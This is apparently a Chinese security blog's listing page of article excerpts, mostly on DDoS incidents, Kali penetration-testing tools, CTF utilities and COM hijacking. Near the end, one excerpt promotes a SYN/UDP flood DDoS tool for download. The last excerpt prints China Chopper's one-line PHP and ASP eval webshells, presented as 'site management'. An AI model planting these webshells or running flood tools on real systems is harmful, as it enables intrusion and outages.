DDoS虽然不是一个新事物，即使是2016年10月21日搞瘫美国半个互联网的Mirai DDoS攻击，也只是让很多人的小心脏稍微颤抖了几下，然后又恢复了往日的平静。大家感觉DDoS只是一时的攻击，不是时刻刀架在脖子上。下面的8大幻想还在很多客户的脑海里打转：关于DDoS的八大幻想幻想1：公司数据中心已经有了DDoS防护，就可以轻松抵挡DDoS来犯?事实果真如此吗?最近业界发现的最大的DDoS攻击峰值流量已经达到500Gbps，几乎没有哪个客户可以通过自己的数据中心部署的DDoS防护来抵挡住这么大流量的攻击。并且过去几年DDoS的攻击流量不断提升，特别是IoT的广泛部署，更是方便了僵尸的快速集结，降低了DDoS攻击的成本，提升了DDoS攻击危害。今天云清洗和本地数据中心的双重防护才是出路，这已经成为了DDoS业界共识。全球DDoS峰值流量进展数据来源：Arbor全球架构安全第11年年度报告幻想2：我们公司不会成为DDoS攻击的对象?虽然90%的DDoS攻击针对的是专业领域，其中81%的DDoS攻击针对教育用户。但任何用户都不能掉以轻心，因为随着各个行业移动化、数字化和互联网化的加速，任何用户都很容易成为DDoS攻击的对象。基于云端的DDoS防护成为IT投资中不可或缺的一部分，就像今天的各种保险一样。幻想3：公司的防火墙可以抵挡DDoS攻击?最近的调研表明，超过40%的DDoS攻击可以 ...继续阅读 (4)

该课程主要讲后门技术实战，偏重于渗透成功后的维持访问。共包含 10 个实验，每个实验都提供详细的步骤和截图，其中会有专门的三节实验，专门用来讲解木马的制作，以及对生成的后门木马的源码分析 。课程介绍：Kali 的教程网上有很多，但缺少系统化的在线实验课程，所以我们策划制作了Kali 渗透测试系列训练营，针对 FTP，Tomcat，NFS，VNC，Samba，SSH服务的安全漏洞， 使用 Nmap 及 Metasploit 等安全工具进行渗透测试。与其他教程主要的不同点：提供在线实验环境，保证可以 完全在线完成所有实验，省去本地搭建环境的繁琐；实验步骤尽可能的详细，提供每个步骤的详细截图，让零基础的新手也可以动手完成；理论与实践结合，不只是使用工具攻击，还会介绍漏洞攻击原理及攻击模块实现代码；实验环境：实验环境中攻击机使用的是 Kali 虚拟机，系统为最新版2.0-201602，另外提供一台有多种漏洞的 Linux 实验机做为靶机。部分实验过程中的截图。Metasploit 启动截图：此处输入图片的描述对目标靶机进行攻击：图片描述实验列表：实验1：维持访问的基本思路介绍实验2：Metasploit 创建 WebShell实验3：使用 Sbd 及 Dbd 创建系统安全后门实验4：PowerSploit 创建 Windows 后门实验5：Backdoor-factory 向程序中植入木马 ...继续阅读 (7)

* 本文作者：米斯特安全团队，未经许可禁止转载开发思路很早之前，就有个开发一个帮助CTFer更快速收拾那些分值占中或下的MISC以及Crypto题的想法(不同的CTF比赛中对题类型的估值不同)。在跟@4ido10n 精灵师傅这位CTF老司机的交流中，也给我颇多支持。于是乎有了：CTFcryptoCrack 这个工具的诞生。也让我收获了一部分用户，很感谢之前许多找我授权使用源码的朋友。正是你们的支持让我有了继续开发的动力，于是。我开发了CTFcrackTools这个国内首个CTFcrack框架，很少上墙外找CTF工具，不清楚老外有没有开发过类似的工具。一款支持Crypto/Image/Zip三项Crack并可以让使用者自行编写插件的框架，就这样诞生了。语言是：Java/Python初衷如上面提到：一个帮助CTFer更快速收拾那些分值占中或下的MISC以及Crypto题，并且也相当于一个工具包，帮CTFer们归类总结做过的题目的Crack方法， 在遇到类似的题目不需要一个文件夹一个文件夹的翻找，直接运行这个框架，就可以找到自己当时编写的插件了。0Linchen/CTFCrackTools这个是Github地址。https://github.com/0Linchen/CTFCrackTools/raw/master/CTFtools.zip这个是直接下载的地址（没传百度云。因 ...继续阅读 (7)

日前，企业级ISP提供商XO通信公司(XO Communications)推出了基于Radware攻击缓解系统的分布式拒绝服务(DDoS)攻击缓解服务，作为其安全服务产品系列的重要组成部分。Radware将保护XO的数据中心免遭网络安全威胁的侵扰，并为XO的客户提供增值DDoS缓解服务。XO总部位于弗吉尼亚州，拥有并运营着全球最大的高质量IP和以太网网络，为客户提供国内和国际通信服务。据XO称，客户之所以选择XO通信公司，是因为XO网络的质量和网络覆盖范围、创新性产品和服务的广泛性及其可满足客户需求的个性化咨询服务。近日XO安全服务产品系列中添加的Radware DDoS缓解服务为XO客户提供了由网络安全专家推荐的必要安全实践组件，可以帮助客户缓解严重的网络攻击。部署XO DDoS缓解服务之后，客户可以在网络遭受到DDoS攻击之前规避高昂的意外开销。XO Communications产品管理总监Eric Points表示：“为了向客户提供最佳选择，我们一直在寻求可以帮助我们交付全面的DDoS缓解解决方案的提供商。通过提供满足客户需求的缓解服务，Radware使我们具有了提供不同等级服务的能力。Radware解决方案提高了攻击响应速度并且可以与第三方检测工具进行良好的协作。其高缓解能力和每秒数据包防护能力完全符合我们的需求，并且能够随着企业业务的增长而进行持续扩展。”Radware美 ...继续阅读 (6)

近日，知名数据应用安全公司Imperva的安全专家发现，公司网络遭遇大规模DDoS攻击，其攻击峰值流量达650Gbps。攻击描述Imperva将攻击主力称为“Leet僵尸网络”（Leet Botnet），针对的是Imperva Incapsula网络中的多个IP地址。僵尸网络 Leet 针对 Imperva Incapsula 网络中的多个 IP 地址发动攻击。这次攻击没有针对特定用户，很可能是 Incapsula 的代理服务器对用户 IP 进行了隐藏处理，致使攻击者无法解析受害者的 IP 地址。Imperva发布的分析指出，攻击为什么没有针对某个特定用户，这很难说。很可能罪犯无法解析被Incapsula代理隐藏的受害者真实IP地址。Imperva公司Incapsula产品线的安全研究专家Avishay Zawoznik表示，由于使用了IP地址欺骗技术，难以精确确定攻击中使用的设备。然而，我们在有效载荷内容中发现一些可靠线索，对个别有效载荷进行手工分析后发现某类Linux设备。例如，某些设备包含/proc（pro文件系统）文件夹详情，这是Unix类系统特有的。【攻击峰值高达650 Gbps】对攻击进行分析后，Imperva认为攻击者无法找到隐藏在Imperva代理后的具体目标，从而选择攻击基于云的服务。此次攻击有两波。第一波攻击持续了将近 20 分钟，流量峰值在 400Gbps 左 ...继续阅读 (5)

前两部分请参见：基于SDN开发DDoS攻击检测和防御程序 (一):简介基于SDN开发DDoS攻击检测和防御程序 (二):环境由于一直没有时间继续更新，这里就贴出项目地址，有需要的读者可以参考。https://coding.net/u/ctyr/p/sdn-firewall/git之前录过一段演示视频，主要包括一个前端（可以选择超清哦）：此外，有不少细心的读者根据我留的微信号建立联系，也发现不少读者和我类似都是本科/研究生（曾经），正在做SDN安全方向的研究，于是根据读者的建议建立了一个微信群。目前我们有10个成员，除了我已经工作外，都是来自各个高校，如果有兴趣的小伙伴欢迎加入我们~补充部分如下： ...继续阅读 (5)

kali升级过程cat << EOF > /etc/apt/sources.listdeb http://mirrors.aliyun.com/kali sana main non-free contribdeb-src http://mirrors.aliyun.com/kali sana main non-free contribdeb http://mirrors.aliyun.com/kali-security sana/updates main contrib non-freeEOFapt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y reboot更新不了可以换下更新源#科大源deb http://mirrors.ustc.edu.cn/kali sana main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali sana main non-free contribdeb http://mirrors.ustc.edu.cn/kali-security sana/updates main contrib non-free#阿里源 ...继续阅读 (3)

阅读：13江河塞绝，本是古人生存之大患；而今处于网络空间，DDoS已然成为这一新生空间的重大灾难。一说到DDoS（Distributed Denial of Service），大家都知道这是一种以破坏为目的的攻击，十多年来不断变化，成为不同组织和个人的工具，在网络中的勒索、报复、战争中花样翻新。如果大家想了解这些内容：谁在攻击？他们为什么攻击？用了什么方法？这些方法为什么有用？如果我受到了攻击，那么该如何保护自己呢？可以参考小编之前写的文章《学习手册：浅析DDoS的攻击及防御》，今天在这里，小编总结了几点之前在学习过程中发现的误区，给大家分享一下，欢迎各种探讨。在总结之前，先讲讲啥是“分布式拒绝服务攻击”？为啥很多成本高昂的防护系统+群英荟萃的安全团队，在面对DDoS攻击的时候那么不堪一击？其实在二战的时候，DDoS的攻击方式就已经用于军事上了。早在1939年，德剧14个师兵分三路，从北、南、西不同地方同时进攻波兰，由于波兰兵力分散且移动迟缓，不容易及时调配，因此80万人组成的防线瞬间瓦解。历时20天的战役，主力全军覆没，被世人称之为“闪电战”。这种从多个来源，彼此协同进行攻击方法就是DDoS分布式攻击的根本特征，这种攻击的优势是：持续制造局部优势。对于DDoS攻击，大部分人都是通过报道或者新闻得知的，新闻为了博眼球经常把攻击流量和影响范围来做特别处理，让大家了解到攻击的严重性，但 ...继续阅读 (26)

翻译：WisFree预估稿费：200RMB（不服你也来投稿啊！）投稿方式：发送邮件至linwei#360.cn，或登陆网页版在线投稿前言眼看2016年已经接近尾声，人们很自然地会对这一年所发生的大大小小的事情进行思考和总结，而2017年即将到来，人们也会继续向未来迈出探索的脚步。人们会努力去寻找某些发展趋势的“前兆”，但是，可能你并不用努力去探寻这种“前兆”，因为它们会自动找上门来！就在2016年底，也就是七天之前，我们的网络系统记录下了一次650Gbps的DDoS分布式拒绝服务攻击，这也是我们首次遇到流量如此之大的DDoS攻击。我们通过研究发现，此次大流量的DDoS攻击依旧是由物联网僵尸网络发动的，其中还涉及到某种新型的恶意软件。不过请不用担心，此次攻击已经被我们的网络防御系统轻松地“解决”掉了。攻击描述此次DDoS攻击大概开始于12月21日上午10点55分，针对的是Imperva Incapsula网络中的多个IP地址。目前我们仍然不清楚此次攻击为什么针对的不是特定的用户，但是根据我们的推测，这很有可能是由于攻击者无法解析真正目标的IP地址所造成的，因为客户真正的IP地址已经由Incapsula的代理服务器进行了隐藏处理。因此，攻击者便失去了最佳的攻击目标，所以他们只能将注意力转移到Imperva Incapsula上。下图显示的是攻击流量的相关数据：我们可以从上图中看到，第一 ...继续阅读 (6)

在安装了kali后在网上搜过很多次“跨栏”的姿势，但是搜到的答案要么很麻烦，要么介绍的不够详细易懂，所以就萌生了一个自己去整理一下，总结出一个简单易用教程的想法，仅提供给刚刚使用KaliLinux的萌新们做一个参考，而不必去费时费力的搜索大量的资料。//大前提是你要有一个可用的ss…….安装Shadowsocks的图形化界面//类似Win下的纸飞机直接在 /etc/apt/sources.list 里添加源在/etc/apt/sources.list 最后加上deb http://ppa.launchpad.net/hzwhuang/ss-qt5/ubuntu devel main然后apt-get update&&apt-get install shadowsocks-qt5这时候图形界面的SS管理器就安装好了在应用程序里打开：点击“连接”——》“添加”——》“手动”如下界面注意：不知道什么原因，在这里选择导入json配置文件程序会崩溃，所以尽量手动输入配置完成后点击五角星，如果正常的话会出现延迟XX毫秒不正常的话要去检查一下输入的ss账号信息是否有误安装命令行界面的Shadowsocks1. apt-get install python-pipsudo pip install shadowsocks然后创建配置文件终端输入：gedit / ...继续阅读 (9)

..Nmap的基本功能Nmap的主要功能就是快速扫描大型网络。当然了，如果你要用它来扫描单个主机，它也绝对可以胜任。Nmap可以使用原始IP报文来扫描并发现网络中的主机，并且还可以将主机的操作系统版本、防火墙类型、报文过滤器类型、以及主机所能提供的服务信息全部发送给Nmap的使用者。虽然安全研究人员通常会使用Nmap来进行安全审计，但是Nmap所能做的远远不止这些。Nmap主要有以下三大基本功能：1.     探测目标主机是否在线；2.     扫描主机端口，嗅探目标主机所能提供的网络服务；3.     判断目标主机使用的操作系统；值得注意的是，Nmap不仅可以用来扫描仅有两个节点的LAN网络，而且还可以扫描五百个节点以上的网络。Nmap允许用户自定义扫描任务，用户可以根据自己的需要来自定义扫描操作。Nmap的输出数据是一个目标主机列表，列表中包含有扫描主机的各种信息。Nmap的使用者可以根据这些信息来进行下一步的渗透测试工作。除此之外，Nmap还支持使用脚本来进行渗透测试。在Nmap安装目录下的“share/nmap/scripts”文件夹中，Nmap的开发人员已经为广大用户编写好了一些基本的脚本，用户可以使用这些脚本来完成一些基本的渗透测试任务。实际上，Nma ...继续阅读 (15)

萬物皆聯網成為萬物皆可駭2016年10月21日知名網路服務 Dyn 遭受殭屍網路發動三波巨大規模 DDoS 攻擊，世界各大網站服務皆因為此攻擊而中斷，包括 Amazon、Twitter、Github、PayPal 等大型網站都因此受到影響。資安人員研究發現，本次 DDoS 攻擊的發起者未明，但多數攻擊流量來自殭屍網路「Mirai」，利用 IPCAM、CCTV、DVR、IoT 裝置等系統進行 DDoS 攻擊。為什麼這些設備會成為攻擊的幫凶呢？我們又該如何自保呢？一個攻擊事件，一定有背後的原因。攻擊者一定是有所求，才會進行攻擊，可能是求名、求利或求樂趣。因為 DDoS 攻擊會直接影響目標系統的運作，對系統營運造成影響，在黑色產業的循環中通常會利用這種攻擊來勒索錢財。例如針對營運線上遊戲的公司進行 DDoS 攻擊，讓遊戲服務中斷，逼迫企業將主機的連線花錢「贖」回來。但 Dyn 這次的事件各家都沒有收到類似的勒索信，因此資安專家們推測，這可能是一次練兵，或者甚至是 DDoS 攻擊服務的行銷手法。如果我們用黑色產業的角度去思考一個攻擊行為，就會有截然不同的看法。試想，如果這是一次駭客組織的商業行銷行為，目的是展現這個團隊的 DDoS 攻擊火力，這樣的成果是否可以稱作是一個成功案例呢？如果你是服務購買者，是否對這樣的服務有信心呢？利用 IoT 裝置及網通設備佈建殭屍網路 (botnet) 已經 ...继续阅读 (14)

解决DDoS问题，有人认为很容易，只需要让ISP(互联网服务商)重写互联网即可。重写互联网标准，尤其是处于路由系统核心位置的边界网关协议(BGP)，应得到妥善修订。BGP真心是个非常糟糕的东西，欧洲网络与信息安全局(ENISA)将称之为“互联网的阿克流斯之踵”。理想世界里，这个东西必须被重写。但现实世界中，情况就复杂了。除了要让政府监管机构帮助重写互联网路由层这种可怕的想法，这还像是试图完全重建一艘豪华游轮一样匪夷所思。仅仅是因为游轮服役已久，舱门有点关不严实了就要拆了重建是不合理的。这是艘大船，正航行在海洋上，人们都还生活在里面。无论如何，ISP已经让各种标准帮助阻挡了至少一类DDoS，而且这玩意儿存在16年了。他们所要做的，就是实现和完善它。反射问题尽管有很多子类，DDoS攻击可被分为2大类。第一类是直接攻击，设备直接对目标发起流量洪水。第二类是反射攻击。攻击者通过使用貌似目标的地址，向另一台设备发送数据包，来冒充目标。然后收到数据包的设备就会试图联系目标，实现DDoS攻击并将真正的目标踢掉线。攻击者将IP包头的源地址字段替换成受害目标的地址，玩弄反射设备，让反射设备不知不觉就成了DDoS攻击的帮凶。这有点像是冒用别人的身份发送信件。其中关键在于放大：这取决于所发数据包的类型，发给目标的响应包可能大上一个数量级。路由安全相互商定规范(MANRS)解释称：通过确认源地址和使用能阻 ...继续阅读 (15)

IoTSeeker，Rapid7出品，是一款物联网默认密码凭据网络扫描工具，可以针对特定物联网设备进行扫描检测，发现IoT设备是否使用默认或出厂设置密码凭据。工具介绍前久美国大规模网络中断的原因，已被调查为恶意软件利用物联网设备（CCTV摄像机，DVR等）默认密码凭据，入侵感染，组建僵尸网络发起的DDoS攻击。IoTSeeker可以帮助企业扫描其网络中的物联网设备，检测其密码是否已被修改，或设备是否处于出厂设置状态。早期的Mirai恶意软件主要利用IoT设备的telnet服务进行入侵感染，而IoTSeeker主要利用HTTP / HTTPS服务来进行检测识别。项目地址https://github.com/rapid7/IoTSeeker工具特点为了适应多种类型IoT设备，和大范围IP网络扫描，IoTSeeker具备以下特点：高并行性：使用Perl模块AnyEvent，可以在同一时间执行数以千计的IoT设备扫描可扩展性：无需更改或编写大量代码，支持很多新型设备文件组成：工具文件有两部分组成，一个为设备配置识别的JSON格式文件devices.cfg，另一个为进行扫描控制的Perl文件iotScanner.pl。运行环境：IoTSeeker目前的运行环境仅支持Linux或Mac OS系统安装1.确保系统安装了Perl和cpan（安装方法自行百度）2.用以下命令安装所需Perl模块 ：& ...继续阅读 (5)

* 本文原创作者：MyKings，本文属FreeBuf原创奖励计划，未经许可禁止转载由于一直在做 Web 漏洞扫描器的开发, 那么就必然少不了 Web 的漏洞测试环境, 其中就包括 bWAPP、DVWA、OWASP WebGoat 等这些国际品牌。这些漏洞环境一般搭建比较繁琐, 而且出问题后有不能像 git 那样方便的’回滚’操作, 当然你可以使用 esxi 来管理, 不过虚拟机仍然会存在定期快照、回滚操作较长等繁重操作。那有没有轻量级的能够快速搭建 Web 漏洞的测试环境呢? 答案是有的, 那就是 docker! 接下来我们就使用 docker 进行环境搭建。这里所涉及的项目已经创建在了 github(docker-vulnerability-environment)上。1、Docker 基本命令这里不会过多去讲解 docker, 只会对常用命令进行简要说明。相关详细的使用请参考: 官方文档。使用 docker 前, 需要先安装 docker 的环境, 这里假设环境已安装好。1.1 基本docker info$ docker infodocker stats$ docker statsdocker version$ docker version1.2 镜像docker search ...继续阅读 (10)

当前遭到云端DDoS攻击已变得越来越普遍。在本文中，专家Frank Siemons将与企业分享有关该种攻击方式所需要了解的信息以及如何防范。随着分布式拒绝服务攻击的频率和规模的不断提升，云端服务供应商可能会在带宽争夺战中成为攻击者们的更加关注的目标。云服务供应商（或称之为CSP）的商业模式，包括为客户提供高带宽的互联网连接能力的虚拟化实例。通过CSP直接或通过某一或多个客户间接进入带宽资源池会很容易地造成恶意的DDoS拒绝服务，或称为DDoS以及相关非法操作变得更加严重。这是否是威胁所在？还有企业如何使用云服务保护自己免受这样的威胁？最新进展在2012年，一群网络罪犯利用VE-2014-3120 Elasticsearch 1.1.x漏洞，以及Linux DDoS Trojan Mayday等手段，攻陷了几台Amazon Elastic Cloud Compute的虚拟机。尽管这一漏洞并不只是针对基于云端的系统，同时可以用来对付包括非云端系统在内的任意服务器，但确实为攻击者提供了一些有意义的机会。他们能够从攻陷的云端实例上运行基于用户数据报协议（User Datagram Protocol）的DDoS攻击。攻击者利用云服务供应商亚马逊的输出带宽，在这种情况下距离云服务供应商提供的理想环境相去甚远。如果某一CSP的公共IP地址范围与连接到云端的DDoS攻击产生关联，供应商可以在黑名单 ...继续阅读 (9)

先来看一组数据：艾默生网络能源与Ponemon研究院研究发现，IDC意外宕机平均每分钟总成本从2010年的5617美元增加到现在的8851美元;单个IDC宕机的平均成本从2010年的505502美元增加到现在740357美元;IDC最高宕机从2010年的505502美元增加至2409991美元。IDC宕机是一件几乎无法避免但大家又不想看到的事情。那么数据中心宕机的幕后黑手都有哪些呢?UPS系统故障，包括UPS主机和电池故障，是数据中心意外宕机的首要原因，占所有发生故障的1/4;另外一项让人细思极恐，网络犯罪所导致的数据中心故障增长最快，从2010年占2%增长到到现在的22%，而DDoS攻击便是网络犯罪的元凶首恶。在国内，中国电信的数据显示，2015年共发生DDos攻击17.9298万次，攻击总流量达到276,531.562Tb。那么在如此频繁的攻击之下，IDC如何抵御网络犯罪而造成的宕机是一个不得不考虑的问题 。IDC的DDoS防御众所周知，IDC具备优质机房、充足带宽以及骨干网高速互联的优势，为企业提供互联网高速接入、服务器托管等业务，但行业内竞争日趋激烈，出于商业竞争、打击报复和网络敲诈等诸多原因，导致数据中心遭遇DDoS攻击的频率逐渐升高，进而导致客户受到牵连，造成严重的商业损失。而对于IDC来说，其流量防御分为两种，一种是内外网边界流量防御(南北向流量防御)和内网流量防御( ...继续阅读 (5)

其实网上有很多非常实用的免费安全工具，如果要全部介绍这些工具的话，可能一天一夜的时间都不够。虽然现在也有很多公司会通过试用版软件来“勾引”用户去购买他们完整功能的产品，但是目前市面上仍然有很多功能强大的免费安全工具，包括情报工具、在软件开发阶段保证安全性的工具、渗透测试工具和取证工具等等。工具简介威胁情报工具包括AlienVault的Open Threat Exchange（OTX），这个工具实际上是一个计算机安全平台，它可以收集并共享互联网威胁情报，类似的平台还有Hailataxii和Cymon.io等等。除此之外，我们还有很多静态应用程序安全测试（SAST）工具可供选择，开发人员可以用这些工具来测试采用不同编程语言（C/C++、Ruby on Rails或Python等）开发的软件。就渗透测试而言，我们通常选择使用Nmap安全扫描工具和Wireshark网络协议分析工具。专门的分析取证产品包括GRR远程取证框架、Autopsy和SleuthKit等，这些工具可以对硬盘驱动器和智能手机进行取证分析，而Volatility Foundation的开源框架则可以对系统内存进行取证分析。威胁情报工具安全厂商可以对威胁情报进行分析，并为相应的威胁信息创建签名，而他们的安全检测工具就可以利用这些签名数据来检测安全威胁了。AlienVault的Open Threat Exchange（OTX ...继续阅读 (19)

0x00 enum4linux介绍enum.exe的Linux替代软件，用于枚举Windows和Samba主机中的数据。概述：Enum4linux是一个用于枚举来自Windows和Samba系统的信息的工具。 它试图提供与以前从www.bindview.com可用的enum.exe类似的功能。 它是用Perl编写的，基本上是一个包装Samba工具smbclient，rpclient，net和nmblookup。 工具的用法可以在下面找到例子，以前版本的工具可以在页面底部找到。 dnstracer用于获取给定主机名从给定域名服务器（DNS）的信息，并跟随DNS服务器链得到权威结果。主要特性：RID循环（当Windows 2000上的RestrictAnonymous设置为1时） 用户列表（当Windows 2000上的RestrictAnonymous设置为0时） 组成员信息列表 共享枚举 检测主机是否在工作组或域中 识别远程操作系统 密码策略检索（使用polenum）工具来源：https://labs.portcullis.co.uk/tools/enum4linux/dnstracer主页|Kali dnstracer Repo仓库作者：Mark Lowe证书：GPLv20x01 enum4linux功能root@kali:~# enum4linux -h enum4lin ...继续阅读 (5)

0x00 DotDotPwn介绍DotDotPwn是一个非常灵活的智能模糊器，用于发现软件中的遍历目录漏洞，例如HTTP/FTP/TFTP服务器，Web平台的应用程序（如CMS，ERP，博客等）。此外，它有一个独立于协议的模块，用于将所需的有效负载发送到指定的主机和端口。 另一方面，它也可以使用STDOUT模块以脚本方式使用。DotDotPwn是用perl编程语言编写的，可以在* NIX或Windows平台下运行，它是BackTrack Linux（BT4 R2）中包含的第一个墨西哥人开发的工具。此版本支持的模糊模块：dnstracer用于获取给定主机名从给定域名服务器（DNS）的信息，并跟随DNS服务器链得到权威结果。HTTP HTTP URL FTP TFTP Payload (Protocol independent) STDOUT工具来源：https://github.com/wireghoul/dotdotpwnDotDotPwn主页|Kali DotDotPwn Repo仓库作者：chr1x, nitr0us证书：GPLv20x01 DotDotPwn功能dotdotpwn.pl - DotDotPwn - 目录遍历模糊器root@kali:~# dotdotpwn #################################################### ...继续阅读 (13)

第三章 绕过 WLAN 身份验证作者：Vivek Ramachandran, Cameron Buchanan译者：飞龙协议：CC BY-NC-SA 4.0简介安全的错觉比不安全更加糟糕。– 佚名安全的错觉比不安全更加糟糕，因为你不可能为面对被黑的可能性做准备。WLAN 的身份验证模式可能很弱，可以被破解和绕过。这一章中，我们会查看一些 WLAN 中所使用的基本的身份验证模式，以及学习如何破解它们。3.1 隐藏的 SSID在默认的配置模式下，所有接入点都在信标帧中发送它们的 SSID。这让附近的客户端能够轻易发现它们。隐藏 SSID 是个配置项，其中接入点并不在信标帧中广播它的 SSID。因此，只有知道接入点 SSID 的客户端可以连接它。不幸的是，这个方法不能提供可靠的安全，但是网络管理员认为它很安全。隐藏 SSID 不应该被看作安全手段。我们现在来看看如何发现隐藏的 SSID。实践时间 – 发现隐藏的 SSID执行下列指南以开始：使用 Wireshark，如果我们监控Wireless Lab网络中的信标帧信标帧，我们就能够以纯文本查看 SSID。你应该能看到信标真，像这样：配置你的接入点来隐藏Wireless Lab网络的 SSID。这个配置项在不同接入点中可能不同。这里，我需要检查Visibility Status选项的Invisible选项，像这样：现在如果你查看 Wire ...继续阅读 (3)

0x00 dnswalk介绍dnswalk是一个DNS调试器，它执行指定域的传送，并以多种方式检查数据库内部一致性以及准确性。工具来源：http://sourceforge.net/projects/dnswalk/dnstracer主页|Kali dnstracer Repo仓库作者：David Barr证书：Artistic0x01 dnswalk功能root@kali:~# dnswalk --help 用法: dnswalk [-选项[-更多选项]] [--] [程序参数1 ...] 接受以下单字符选项: 该选项有参数: -D 布尔型(没有参数): -r -f -i -a -d -m -F -l 选项可以合并在一起，--stop选项不做合并处理 选项及其参数之间不需要空 示例: dnswalk domain.com. 输入的域名必须以'.'结束-r 递归向下查询指定域的子域 -a 打开重复A记录的警告 -d 打印调试和'状态'信息到stderr（仅在重定向stdout时使用） -m 仅在上次运行后域已被修改时才执行检查 -F 执行"fascist"检查，在检查A记录时，不匹配每个IP地址的PTR名称与转发名称和报告 -i 禁止检查域名中的无效字符 -l 执行"lame delega ...继续阅读 (8)

0x00 dnstracer介绍dnstracer用于获取给定主机名从给定域名服务器（DNS）的信息，并跟随DNS服务器链得到权威结果。工具来源：http://www.mavetju.org/unix/general.phpdnstracer主页|Kali dnstracer Repo仓库作者：Edwin Groothuis证书：BSD0x01 dnstracer功能dnstracer - 跟踪到源的DNS查询工具root@kali:~# dnstracer DNSTRACER version 1.8.1 - (c) Edwin Groothuis - http://www.mavetju.org 用法: dnstracer [选项] [主机名] -c: 禁用本地缓存,默认启用 -C: 启用负缓存，默认禁用 -o: 启用返回结果的概述，默认禁用 -q <querytype>: DNS请求查询类型，默认为A -r <retries>: DNS请求的重试次数，默认值3 -s <server>: 使用此服务器的初始请求，默认lo ...继续阅读 (21)

打开文件夹就能运行指定的程序？这不是天方夜谭，而是在现实世界中确实存在的。利用本文探讨的COM劫持技术，可以轻松实现出打开文件夹就运行指定代码的功能。对于COM劫持技术，国内很少有资料进行原理阐述，本文结合自身分析经验对COM劫持技术进行归纳总结。同时，希望各大安全厂商针对此类利用做好防护，保护用户信息安全。前言所谓“骂人先骂娘，擒贼先擒王”，首先给出读者最最关心的劫持文件夹的利用方法的效果展示：为了理解本文内容，我们首先要了解COM的一些基本的概念：接口：一组函数的总称，这些函数也被称为”方法”，接口的名称都是以“I”开关，如：”IShellFolder”.接口可以继承。Component object class(coclass)：也就是组件，组件包含在一个DLL或者exe文件中，它包含了一个或多个接口的实现代码。组件实现了它包含的所有接口。COM object：是组件的一个实例。COM server：一个dll或者exe文件，包含了一个或者多个组件。COM library：是操作系统的一部分，负责响应用户程序。GUID：唯一的、128位的标识对象的标识. 全局唯一标识符，是唯一的一个ID，类似于物理网址那样。CLSID：class id，唯一的标识组件。IID：interface id，用来标识接口。 此外，对于windows操作系统，存在着虚拟文件夹，控制面板，我 ...继续阅读 (7)

有时候你会发现，你在搜索引擎输入网站名称的时候，出来的网站信息是你们的，但是域名却是一个陌生的，这种情况可以基本确定网站被镜像了，那么究竟什么叫网站被镜像？恶意镜像，也叫恶意克隆，恶意解析，是指有人通过域名A记录直接解析别人IP地址，从而得到一个在访问者眼中完全相同网站的过程。其工作原理基本上是这样子的：有用户访问镜像站点时，程序就会来正版的站点查询数据，并修改相关链接然后呈献给用户，实质上还是在读取原站的数据。严谨一点的解释：通过复制整个网站或部分网页内容并分配以不同域名和服务器，以此欺骗搜索引擎对同一站点或同一页面进行多次索引的行为 。网站被镜像的危害通俗的讲，恶意镜像者意图利用自己有一定权重的域名进行威压，通过某些手段复制了你的站点，除了域名不一样之外，其他内容一模一样，用户或许根本无法分辨。甚至对于一些新的站点，搜索引擎都会迷惑到底哪个是真的站点，那么就有可能正牌的网站被删除收录，而盗版的却被搜索引擎青睐。虽然目前我们还不知道恶意镜像我们的网站到底有什么意图，但肯定对我们没什么好处，如果他这个域名有点什么不健康的信息，那么我们被镜像的站点有可能被污染掉，所以还是要警惕这个现象。 如何知道自己的网站是否被镜像复制自己网站的完整标题（PS：查看自己站点首页源码，其中<title>小残博客– 关注网络安全</title>），然后在谷歌 ...继续阅读 (9)

9月8日谷歌宣布，从2017年1月（Chrome56）开始，正式将某些HTTP页面标记“不安全”，比如含密码或信用卡信息传输的HTTP页面，而未来的长期计划是将所有HTTP页面都标为不安全，目的是让用户更加安全的浏览站点。图1：Chrome56将HTTP页面标记“不安全”谷歌Chrome目前对HTTP的标记还比较中性，不能很好的反映HTTP的安全性缺失，谷歌的计划是将HTTP页面的不安全性更加清晰准确地标记出来，而这项计划将分阶段实施。2017年开始，Chrome56将把含密码或信用卡信息传输的HTTP页面标记“不安全”，因为它们特殊的敏感性。而后续版本中，谷歌将把HTTP警告进一步延伸，比如更加注重隐私的无痕浏览模式下，将所有HTTP页面标记“不安全”。最终目标是，将所有情况下的HTTP页面都标记为“不安全”并以红色三角形作为警告标识，就像给失效的HTTPS连接的标识一样。图2：最终将所有HTTP页面标记红色三角形警告谷歌将在未来的版本中按此计划更新发布，但是建议网站尽快从HTTP转换成HTTPS。HTTPS已经比以往任何时候都更加容易实施，价格也更加便宜了。网络的性能和最新功能对HTTP将更加敏感。了解谷歌的指南，开始入手建立HTTPS加密。 ...继续阅读 (4)

QQ蜗牛攻击器感觉威力还是很猛的，亮点是集合了多种攻击模式，方便，易携带。。呵呵。下面是这个工具的一些介绍：  蜗牛最终版更新说明 1：增加最小化后自动隐藏到托盘 2：集成 NetPerSec 流量监控软件 3：集成任务管理器（某些系统会限制或删除任务管理器，点击蜗牛上的 TaskMgr 可正常打开任务管理器） 4：重新打造SYN，集成市面上最常用的一款SYN发包，同时可选择控制此程序的运行时间，时间到后不管服务器是否处于联网状态都会强行关掉SYN程序（完美解决有些服务器因不能发SYN导致卡死的问题）5：集成UDP发包，也是一款常用的，就不多介绍了蜗牛更新到此结束，以后不再出新版，谢谢喜欢蜗牛的朋友一路相伴 百度网盘下载地址 :————————————————————————– 免责申明：请使用者注意使用环境并遵守国家相关法律法规！由于使用不当造成的后果本厂家不承担任何责任！————————————————————————– ...继续阅读 (34)

中国菜刀，不是原来切菜做饭的道具，而是一款专业的网站管理软件，用途广泛，使用方便，小巧实用。只要支持动态脚本的网站，都可以用中国菜刀来进行管理！在非简体中文环境下使用，自动切换到英文界面。UINCODE方式编译，支持多国语言输入显示。  功能介绍:只要网页是非静态页面:也就是支持动态脚本的网站 （asp,jsp,aspx,php），都可以用中国菜刀来进行管理！主要功能有：文件管理，虚拟终端，数据库管理。UINCODE方式编译，支持多国语言输入显示。一、EVAL客户端部分1.服务端只需要简单的一行代码，即可用此程序实现常用的管理功能。支持的服务端脚本：PHP, ASP，NET。在服务端运行的代码如下： PHP:Crayon Syntax Highlighter v_2.7.2_beta<?PHP eval($_POST[w]);?>1<?PHPeval($_POST[w]);?>[Format Time: 0.0003 seconds]ASP:Crayon Syntax Highlighter v_2.7.2_beta<%eval request("pass")%>1<%evalrequest("pass")%>[Format Time: 0.0001 seconds] .NET:Crayon S ...继续阅读 